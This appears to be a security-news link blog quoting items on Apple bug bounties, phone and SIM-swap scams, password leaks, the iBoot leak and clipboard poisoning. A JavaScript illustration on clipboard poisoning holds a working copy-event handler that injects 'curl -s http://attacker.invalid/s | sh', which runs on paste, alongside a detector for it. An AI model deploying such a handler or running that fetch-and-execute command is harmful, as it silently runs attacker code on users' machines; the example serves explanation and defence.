Between the period of July 6th to October 6th, myself, Brett Buerhaus, Ben Sadeghipour, Samuel Erb, and Tanner Barnes worked together and hacked on the Apple bug bounty program.
There were a total of 55 vulnerabilities discovered with 11 critical severity, 29 high severity, 13 medium severity, and 2 low severity reports. These severities were assessed by us for summarization purposes and are dependent on a mix of CVSS and our understanding of the business related impact.
As of October 6th, 2020, the vast majority of these findings have been fixed and credited. They were typically remediated within 1-2 business days (with some being fixed in as little as 4-6 hours).
I was genuinely surprised Apple reacted so fast. The whole thing is well worth a read.
Rob Griffiths, on Robservatory:
Yesterday, instead of having a productive afternoon at home, I had the privilege of sitting at the bank for a couple of hours, resolving a problem completely of my own doing: I fell for a phone scammer. My wife and I had to close our accounts—which were in excess of 25 years old—and set up new ones. I then spent hours updating our various bill paying services, Quicken account access, etc.
Do yourself a favor, and don’t be me. I never thought I’d be “that guy” either, as I keep current on scams, look for signs of fishiness on phone calls, etc. Still, they got me, and it was painful—not necessarily in terms of financial loss (we’re out $500 for maybe 60 to 90 days while they investigate), but in terms of time: Time to fix what I did, and even more time spent beating myself up over my stupidity.
I have a strict rule — I do not give out any personal data or passwords to anyone, especially over the phone, even if I know it’s the bank calling me. I will either ask to call them back, to make sure I’m dialling the correct number, or I’ll go down to their branch personally.
Luckily Rob should pull through this one fine — he’s out some $500, which he’ll probably get back. It could have been much worse.
Google’s post, issued six months after iOS patches were released, creates the false impression of “mass exploitation” to “monitor the private activities of entire populations in real time,” stoking fear among all iPhone users that their devices had been compromised. This was never the case.
Second, all evidence indicates that these website attacks were only operational for a brief period, roughly two months, not “two years” as Google implies. We fixed the vulnerabilities in question in February — working extremely quickly to resolve the issue just 10 days after we learned about it. When Google approached us, we were already in the process of fixing the exploited bugs.
We now have two sides to the story. Where does the truth lie?
Matthew Miller, on ZDNet:
First they hijacked my T-Mobile service, then they stole my Google and Twitter accounts and charged my bank with a $25,000 Bitcoin purchase. I’m stuck in my own personal Black Mirror episode. Why will no one help me?
I use a password manager, but I made it a point many years ago to keep some passwords only in my head, my banking login information included.
Regarding the part about Google and Twitter — it’s 2019 and getting help from those companies, in critical situations, is basically impossible. Baffling.
I lost north of $100,000 last Wednesday. It evaporated over a 24-hour time span in a “SIM port attack” that drained my Coinbase account. It has been four days since the incident and I’m gutted. I have zero appetite; my sleep is restless; I am awash in feelings of anxiety, remorse, and embarrassment.
This was the single most expensive lesson of my life and I want to share my experience + lessons learned with as many people as possible. My goal is to increase awareness about these types of attacks and to motivate you to increase the security of your online identity.
I try to take all my security very seriously, but since “I know what I’m doing”, I do like to cut corners a bit. Not as much as Sean though. His piece has motivated me to review my whole setup.
Just two weeks after admitting it stored hundreds of millions of its users’ own passwords insecurely, Facebook is demanding some users fork over the password for their outside email account as the price of admission to the social network.
Facebook users are being interrupted by an interstitial demanding they provide the password for the email account they gave to Facebook when signing up. “To continue using Facebook, you’ll need to confirm your email,” the message demands. “Since you signed up with [email address], you can do that automatically …”
A form below the message asked for the users’ “email password.”
“That’s beyond sketchy,” security consultant Jake Williams told the Daily Beast. “They should not be taking your password or handling your password in the background. If that’s what’s required to sign up with Facebook, you’re better off not being on Facebook.”
The people running Facebook need to be criminally charged for all the wrong that they’ve done and continue to do.
And please just go and delete your Facebook account.
Thomas Brewster, writing for Forbes:
[…] German 18-year-old Linus Henze has uncovered a vulnerability affecting the latest Apple macOS that leaves stored passwords open to malicious apps. That could include logins for your bank website, Amazon, Netflix, Slack and many more apps. And even though this is a Mac-only bug, if you’re using the iCloud keychain, passwords synced across iPhones and Macs may also be in danger.
To make matters worse, it’s likely that no fix is in the works. Henze isn’t disclosing his findings to Apple, telling Forbes the lack of payment for such research was behind his decision to keep the hack’s details secret from the Cupertino giant.
This is bad, and while I understand why he doesn’t want to disclose it to Apple, all macOS users are susceptible to a security breach.
Andy Greenberg, reporting for Wired:
When hackers breached companies like Dropbox and LinkedIn in recent years—stealing 71 and 117 million passwords, respectively—they at least had the decency to exploit those stolen credentials in secret, or sell them for thousands of dollars on the dark web. Now, it seems, someone has cobbled together those breached databases and many more into a gargantuan, unprecedented collection of 2.2 billion unique usernames and associated passwords, and is freely distributing them on hacker forums and torrents, throwing out the private data of a significant fraction of humanity like last year’s phone book.
You can (allegedly) safely check which of your accounts have been breached on Have I Been Pwned. Oh and if you aren’t yet doing so, I strongly recommend using a password manager, such as 1Password.
Joel Schectman, for Reuters:
The ex-Raven operatives described Karma as a tool that could remotely grant access to iPhones simply by uploading phone numbers or email accounts into an automated targeting system. The tool has limits — it doesn’t work on Android devices and doesn’t intercept phone calls. But it was unusually potent because, unlike many exploits, Karma did not require a target to click on a link sent to an iPhone, they said.
In 2016 and 2017, Karma was used to obtain photos, emails, text messages and location information from targets’ iPhones. The technique also helped the hackers harvest saved passwords, which could be used for other intrusions.
It isn’t clear whether the Karma hack remains in use. The former operatives said that by the end of 2017, security updates to Apple Inc’s iPhone software had made Karma far less effective.
How many tools are currently out in the world, whose existence we are completely oblivious to?
Brendan Koerner, for Wired:
Pokora had long been aware that his misdeeds had angered some powerful interests, and not just within the gaming industry; in the course of seeking out all things Xbox, he and his associates had wormed into American military networks too. But in those early hours after his arrest, Pokora had no clue just how much legal wrath he’d brought upon his head: For eight months he’d been under sealed indictment for conspiring to steal as much as $1 billion worth of intellectual property, and federal prosecutors were intent on making him the first foreign hacker to be convicted for the theft of American trade secrets. Several of his friends and colleagues would end up being pulled into the vortex of trouble he’d helped create; one would become an informant, one would become a fugitive, and one would end up dead.
It’s amazing how fast someone’s judgement can become skewed the wrong way.
From their FAQ:
On March 25, 2018, we became aware that during February of this year an unauthorized party acquired data associated with MyFitnessPal user accounts […]
The affected information included usernames, email addresses, and hashed passwords – the majority with the hashing function called bcrypt used to secure passwords.
The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers) because we don’t collect that information from users. Payment card data was not affected because it is collected and processed separately.
I still have an account over there which I don’t use. Time to get rid of it.
Lorenzo Franceschi-Bicchierai, writing for Motherboard:
Someone just posted what experts say is the source code for a core component of the iPhone’s operating system on GitHub, which could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve.
The GitHub code is labeled “iBoot,” which is the part of iOS that is responsible for ensuring a trusted boot of the operating system. In other words, it’s the program that loads iOS, the very first process that runs when you turn on your iPhone. It loads and verifies the kernel is properly signed by Apple and then executes it—it’s like the iPhone’s BIOS.
The code says it’s for iOS 9, an older version of the operating system, but portions of it are likely to still be used in iOS 11.
Apple has already filed a copyright takedown request with GitHub, which resulted in the code being removed, but that won’t help much — the code is out in the wild.
This is the tale of a macOS-only vulnerability in IOHIDFamily that yields kernel r/w and can be exploited by any unprivileged user.
Physical access not required. Apple is supposedly aware of it.
Apple pushed a security update for the huge High Sierra vulnerability yesterday, introducing a bug while they were at it. You should install the update as soon as possible and then do this, if File Sharing isn’t working:
- Open the Terminal app, which is in the Utilities folder of your Applications folder.
- Type sudo /usr/libexec/configureLocalKDC and press Return.
- Enter your administrator password and press Return.
- Quit the Terminal app.
John Gruber summarized the problem, which seems to have been around for a few months now:
So the exploit was floating around, under the radar, for weeks at least, but it seems as though no widespread harm came of it.
Personally, I’d call this much too optimistic — people could have been hacked without them even realizing it.
Graham Cluley drew my attention the other day to an issue that has apparently been known to some for years, but was new to me: clipboard poisoning, an issue where a website can replace what you think is on your clipboard with something else (…)
It turns out that there’s a possibility that this could lead to remote code execution. In other words, it could lead to someone else’s malicious code being run on your computer without your knowledge!
Once malicious code has been run on your computer, that code can download and install other processes, and in no time, your Mac has been pwned.
The key to this issue lies with any code that the user might copy from a website, then copy somewhere else in such a way that it is automatically executed. It turns out that this is possible with shell scripts pasted into the Terminal.
As an example, consider the following command, which is commonly cited as a way to make your Mac show hidden files:
defaults write com.apple.finder AppleShowAllFiles TRUE; killall Finder
Read his full post for tips how to keep yourself safe.
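A worked illustration of the copy-event trick Reed describes, added here as an example; it is not code from the original post or from Malwarebytes. The hidden command, the host name attacker.invalid and the helper names are assumptions, and the browser copy event is replaced by a small stand-in so the logic runs in Node without a DOM:

```javascript
// Added example for the clipboard-poisoning post above; not code from the
// original article or from Malwarebytes. The hidden command, the host
// attacker.invalid and the helper names are constructed for illustration.

// --- Attacker side: what a malicious page's copy handler can do -------------

// Build the text that actually lands on the clipboard. The hidden command
// goes first, the text the victim selected follows so the expected effect
// still happens, and the trailing newline makes Terminal run the whole line
// the moment it is pasted, before the victim has a chance to read it.
function buildPoisonedClipboard(visibleCommand, hiddenCommand) {
  return `${hiddenCommand}; ${visibleCommand}\n`;
}

// Handle a `copy` event: overwrite the clipboard and suppress the browser's
// default copy of the real selection. getSelectedText is injected so the
// logic can be exercised outside a browser; in a real page it would be
// () => String(window.getSelection()).
function poisonCopyEvent(event, hiddenCommand, getSelectedText) {
  const visible = getSelectedText();
  event.clipboardData.setData('text/plain', buildPoisonedClipboard(visible, hiddenCommand));
  event.preventDefault();
  return event;
}

// Browser wiring on a hypothetical malicious page (not executed here):
// document.addEventListener('copy', (e) =>
//   poisonCopyEvent(e, 'curl -s http://attacker.invalid/s | sh',
//                   () => String(window.getSelection())));

// Minimal stand-in for a ClipboardEvent so the handler can run under Node.
function makeFakeCopyEvent() {
  const ev = { data: {}, defaultPrevented: false };
  ev.clipboardData = { setData: (type, value) => { ev.data[type] = value; } };
  ev.preventDefault = () => { ev.defaultPrevented = true; };
  return ev;
}

// --- Defender side: inspect clipboard text before it reaches a terminal ----

// Returns whether the text would execute on paste (a newline), plus every
// command it chains and any other signs of hidden content.
function inspectClipboardText(text) {
  const findings = [];
  const autoExecutes = /[\r\n]/.test(text);
  if (autoExecutes) findings.push('contains a newline: Terminal executes it on paste');
  if (/[\u200b-\u200d\u2060\ufeff]/.test(text)) findings.push('contains zero-width characters');
  if (/\x1b\[/.test(text)) findings.push('contains terminal escape sequences');
  const commands = text
    .split(/\r?\n|;|&&|\|\|?/)   // split on newlines, ';', '&&', '|' and '||'
    .map((s) => s.trim())
    .filter(Boolean);
  if (commands.length > 1) findings.push(`${commands.length} chained commands`);
  return { autoExecutes, commands, findings };
}

// Demo with the Finder command quoted in the post as the "visible" text.
const visible = 'defaults write com.apple.finder AppleShowAllFiles TRUE; killall Finder';
const poisoned = poisonCopyEvent(makeFakeCopyEvent(),
  'curl -s http://attacker.invalid/s | sh', () => visible);
console.log(JSON.stringify(poisoned.data['text/plain']));
console.log(inspectClipboardText(poisoned.data['text/plain']));
```

The practical takeaway is the inspector's first finding: a command you meant to read before running should never contain a newline. Pasting into a plain text editor first, rather than straight into Terminal, gives you the same look at every chained command that inspectClipboardText prints.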
Anti-virus provider MacKeeper is known for pushing the message Apple Mac owners need protection. It needed some extra protection of its own today, after a white hat hacker discovered a database containing 13 million customer records was accessible by just visiting a selection of IP addresses, no username or password required.
Do not install this crap. Ever. And delete it if already installed. It does not help in any meaningful way, and is harmful in many others.
I created my first linked list blog a few years back — it was in Polish and I ran it for a bit over seven years. I launched Infinite Diaries since, but I never got to answer one question which people have been asking me for years: How do I hack WordPress to create a ‘Linked List Blog’?